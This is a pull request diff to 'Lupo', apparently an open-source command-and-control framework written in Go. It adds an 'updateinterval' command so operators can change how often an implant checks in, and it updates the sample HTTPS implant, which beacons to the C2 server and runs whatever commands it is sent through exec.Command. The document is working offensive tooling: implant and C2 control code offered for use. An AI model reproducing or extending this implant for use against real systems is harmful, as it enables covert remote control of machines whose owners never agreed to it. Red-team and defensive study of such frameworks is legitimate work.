### PR TITLE
Adds support for dynamically updating Implant check in intervals

### DIFF
--- a/lupo-client/cmd/interact.go
+++ b/lupo-client/cmd/interact.go
@@ -154,7 +154,7 @@ func init() {
 			err = json.Unmarshal([]byte(coreResponseData), &coreResponse)
 
 			if err != nil {
-				//fmt.Println(err)
+				fmt.Println(err)
 				return nil
 			}
 

--- a/lupo-client/cmd/lupo.go
+++ b/lupo-client/cmd/lupo.go
@@ -71,7 +71,7 @@ func init() {
 		a.Println("                       `...``..`                            		")
 		a.Println("                          ...                                ")
 		a.Println()
-		a.Println("v1.0.3")
+		a.Println("v1.0.5")
 		a.Println()
 	})
 

--- a/lupo-client/cmd/sessions.go
+++ b/lupo-client/cmd/sessions.go
@@ -400,4 +400,36 @@ func InitializeSessionCLI(sessionApp *grumble.App, activeSession int) {
 
 	sessionApp.AddCommand(sessionDownloadCmd)
 
+	sessionUpdateIntervalCmd := &grumble.Command{
+		Name:     "updateinterval",
+		Help:     "changes the implant's update interval for check in",
+		LongHelp: "Changes the implant's update interval for checking in to the Lupo C2 server",
+		Args: func(a *grumble.Args) {
+			a.Int("interval", "path of the file to download")
+		},
+		Run: func(c *grumble.Context) error {
+
+			updateInterval := c.Args.Int("interval")
+			updateIntervalStr := strconv.Itoa(updateInterval)
+
+			// Exec on server and get session functions
+
+			reqString := "&isSessionShell=true&activeSession=" + strconv.Itoa(ActiveSession) + "&command=updateinterval&interval=" + updateIntervalStr
+
+			reqString = core.AuthURL + reqString
+
+			resp, err := core.WolfPackHTTP.Get(reqString)
+
+			if err != nil {
+				return err
+			}
+
+			defer resp.Body.Close()
+
+			return nil
+		},
+	}
+
+	sessionApp.AddCommand(sessionUpdateIntervalCmd)
+
 }

--- a/lupo-server/cmd/lupo.go
+++ b/lupo-server/cmd/lupo.go
@@ -69,7 +69,7 @@ func init() {
 		a.Println("                       `...``..`                            		")
 		a.Println("                          ...                                ")
 		a.Println()
-		a.Println("v1.0.4")
+		a.Println("v1.0.5")
 		a.Println()
 	})
 

--- a/lupo-server/cmd/sessions.go
+++ b/lupo-server/cmd/sessions.go
@@ -299,4 +299,47 @@ func InitializeSessionCLI(sessionApp *grumble.App, activeSession int) {
 
 	sessionApp.AddCommand(sessionDownloadCmd)
 
+	sessionUpdateIntervalCmd := &grumble.Command{
+		Name:     "updateinterval",
+		Help:     "changes the implant's update interval for check in",
+		LongHelp: "Changes the implant's update interval for checking in to the Lupo C2 server",
+		Args: func(a *grumble.Args) {
+			a.Int("interval", "path of the file to download")
+		},
+		Run: func(c *grumble.Context) error {
+
+			updateInterval := c.Args.Int("interval")
+			updateIntervalStr := strconv.Itoa(updateInterval)
+
+			var operator string
+
+			operator = "server"
+
+			core.LogData(operator + " executed: updateinterval " + updateIntervalStr)
+
+			if core.Sessions[activeSession].CommandQuery != "" {
+				session := core.Sessions[activeSession]
+
+				cmdString := "updateinterval"
+
+				data, err := core.ExecuteConnection(session.Rhost, session.Rport, session.Protocol, session.ShellPath, session.CommandQuery, cmdString, session.Query, session.RequestType, updateIntervalStr, "")
+				if err != nil {
+					return err
+				}
+
+				core.LogData("Session " + strconv.Itoa(activeSession) + " returned:\n" + data)
+
+			} else {
+				cmdString := "updateinterval " + updateIntervalStr
+
+				core.QueueImplantCommand(activeSession, cmdString, "server")
+
+			}
+
+			return nil
+		},
+	}
+
+	sessionApp.AddCommand(sessionUpdateIntervalCmd)
+
 }

--- a/sample/lupo_implant_https.go
+++ b/sample/lupo_implant_https.go
@@ -34,19 +34,19 @@ type lupoImplant struct {
 var implant *lupoImplant
 
 var rootCert string = `-----BEGIN CERTIFICATE-----
-MIICaDCCAe6gAwIBAgIUYLDpgVk6sWoVs8YncVZb1fyia48wCgYIKoZIzj0EAwIw
+MIICaTCCAe6gAwIBAgIUKfmymT17yUxMTaCSiw/oW9NVW4IwCgYIKoZIzj0EAwIw
 XTELMAkGA1UEBhMCVVMxDTALBgNVBAgMBEx1cG8xDTALBgNVBAcMBEx1cG8xDTAL
 BgNVBAoMBEx1cG8xDTALBgNVBAsMBEx1cG8xEjAQBgNVBAMMCTEyNy4wLjAuMTAe
-Fw0yMjExMDQxODI1NDVaFw0zMjExMDExODI1NDVaMF0xCzAJBgNVBAYTAlVTMQ0w
+Fw0yMjEyMTkxOTMzMTFaFw0zMjEyMTYxOTMzMTFaMF0xCzAJBgNVBAYTAlVTMQ0w
 CwYDVQQIDARMdXBvMQ0wCwYDVQQHDARMdXBvMQ0wCwYDVQQKDARMdXBvMQ0wCwYD
 VQQLDARMdXBvMRIwEAYDVQQDDAkxMjcuMC4wLjEwdjAQBgcqhkjOPQIBBgUrgQQA
-IgNiAARByJuNeJHhznNJKGCnP4qfDdf2rBRpn9HMAgik1OuFY7DmcSqom52lqZa+
-SX6VZmgl+VvzaxKe6hZkpYlxPXxCIE5iNBSn0nox6mPJwIchUph2NA78MVh7h1fn
-6YWj562jbzBtMB0GA1UdDgQWBBQcYBUg4If+4KCWvwTAua9L1TuaxTAfBgNVHSME
-GDAWgBQcYBUg4If+4KCWvwTAua9L1TuaxTAPBgNVHRMBAf8EBTADAQH/MBoGA1Ud
-EQQTMBGCCTEyNy4wLjAuMYcEfwAAATAKBggqhkjOPQQDAgNoADBlAjEAiZhS4ek6
-XYNuX0v2bLC10tXwD/U/JAAj/s+ksHfS6Pe7KMSMeDmtaHzPQLGcPEAxAjBY4qv9
-Fb/3Nn0/dl3V11rvAExZ10P2PsuceIwFUu/ICj60OLhC9aTuw+jp9EbkGC0=
+IgNiAATW8S3Irhx/h7cHAhoTjn2irThu7UpXbaS17jOYRtL6g564GVXG0QLGuRfW
+GamAlMKbFscHOFni3zTN71p5Tk+tbKCNhlk1WVfLoIuBBfy//evfUIPbtYmC4dnA
+ShAoAy2jbzBtMB0GA1UdDgQWBBQN8HZXeJBIsIGWbMKvqfN2sKV9HzAfBgNVHSME
+GDAWgBQN8HZXeJBIsIGWbMKvqfN2sKV9HzAPBgNVHRMBAf8EBTADAQH/MBoGA1Ud
+EQQTMBGCCTEyNy4wLjAuMYcEfwAAATAKBggqhkjOPQQDAgNpADBmAjEAucrRQ8fB
+0cqYmev4gAalTUDQbnj5a61XN5s/lA2N+UklPZcib+K3Ekx6HFNEr/g/AjEA2fm7
+mayCI7NeNwbGgd71ufRDxGGoux7OS206gORLDexDJNhWb0I+vQP1tN/zciDs
 -----END CERTIFICATE-----
 `
 
@@ -246,6 +246,12 @@ func ExecLoop(implant *lupoImplant, client *http.Client) {
 
 					fileString = "&filename=" + url.QueryEscape(filename) + "&file=" + url.QueryEscape(encoded)
 
+				} else if cmd == "updateinterval" {
+					implant.updateInterval, err = strconv.Atoi(argS[0])
+					if err != nil {
+						return
+					}
+					dataString = "Implant interval updated to: " + strconv.Itoa(implant.updateInterval)
 				} else {
 					data, err = exec.Command(cmd, argS...).Output()
 				}
@@ -267,7 +273,7 @@ func ExecLoop(implant *lupoImplant, client *http.Client) {
 			}
 
 			// Return a response with our standard auth and include the data parameter with our command output to display in Lupo
-			requestParams = "/?psk=" + implant.psk + "&sessionID=" + strconv.Itoa(implant.id) + "&UUID=" + implant.uuid + "&user=" + operator + dataString + fileString
+			requestParams = "/?psk=" + implant.psk + "&sessionID=" + strconv.Itoa(implant.id) + "&UUID=" + implant.uuid + "&update=" + strconv.Itoa(implant.updateInterval) + "&user=" + operator + dataString + fileString
 			requestUrl = connectionString + requestParams
 
 			resp, err = client.Get(requestUrl)


### PR DESCRIPTION
# Pull Request

## Description
Adds a new command to the client/server to allow update intervals to be dynamically assigned after implant check in.

## Features
(REPLACE ME WITH A LIST OF FEATURES/FUNCTIONALITY/BUG FIXES)
- Adds "updateinterval" sub command to the sessions CLI which can update an implant's check in interval delay.

## Screenshot(s)/Change Detail(s) (Optional)
![Screenshot 2022-12-19 at 2 50 42 PM](https://user-images.githubusercontent.com/14339392/208508278-e92c241e-e520-4dbe-ad45-a68e9ee73431.png)
